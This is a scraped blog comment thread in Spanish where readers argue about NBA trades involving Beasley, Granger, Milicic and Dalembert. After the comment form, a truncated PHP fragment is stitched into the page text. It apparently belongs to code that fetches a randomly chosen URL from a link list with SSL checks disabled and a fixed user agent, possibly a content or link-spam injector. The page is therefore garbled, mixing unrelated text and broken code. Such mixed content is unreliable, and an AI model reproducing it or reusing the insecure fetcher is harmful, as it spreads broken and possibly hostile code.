    Esteban: wow si que les tienes estima a beasley y milicic, eres su agente o que? beasley igual a granger? que liga miras? milicic igual a dalembert? eres el gm que lo eligio por adelante de wade, bosh y melo?a mi entender le sobran piezas jovenes con salarios bajos que podrian ser atractivos para otros equipos, que por estar mas armados puede que jueguen mejor, los pacers necesitaban un 4 y un 3, granger por beasley y williams podria haberse hecho, reducen en edad, por ejemplolos warriors no van a ningun lado con monta ellis y curry, quiza ofrecerle 3 jugadores que cobran lo mismo que ellis para dar un golpe de timoncreo q tienen suficientes activos atractivos para intercambiar, pero que seas atractivos para intercambiar no significa que sean atractivos para jugar juntos…

    No me importaría ser el manager de Milicic, buenos pellizcos me habría llevado, je,je
    Mira, primero lee bien lo q escribo: no he dicho q Beasley sea mejor q Granger, he dicho q el equipo sería igual de malo o de bueno con uno q con otro… sigue siendo un equipo joven, inexperto, le seguiría faltando un2 y un 1 de gran nivel, tampoco tendrían center, no defienden, tienen entrenador nuevo… ahora, según tus supertrades, pues se traen a Granger a cambio de quién??? Wes Johnson+Beasley??? y va y L. Bird dice que sí, no te fastidia… pero si a Beasley no lo quería nadie, lo regalaba Miami para hacer hueco salarial y no les dieron nada por él… de verdad q no sé qué mundo NBA ves tú para conseguir jugadores de gran nivel (ojo, y q vayan nada más y nada menos q a Minesota) a cambio de jugadores peores q ellos…

      Citar

  28. portu dice:
    #28

    Y Dalembert es un crack de la leche, vamos, lleva toda la vida demostrando en la NBA lo bueno q es, no sé ni como no le han pagado en este mercado de FA más q a Chandler, Nene, Marc o algún otro… y mira q los Rockets estaban desesperados…

      Citar

  29. esteban dice:
    #29

    A ver si me explico, los pacers ya no necesitan a granger, tienen a george de 3, por lo que la salida de granger de 28 años no seria una locura, ya sono su cambio no hace mucho
    Beasley y williams serian buenas adquisiciones para ayudar a sus jovenes

      Citar

  30. melo15 dice:
    #30

    Nose granger no me gusta para los wolves ya pensare quien, pero lo que yo no haria es poner a love de pivot ni de coña es como si pongo a ellis de alero porque ya tengo buenos escoltas

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>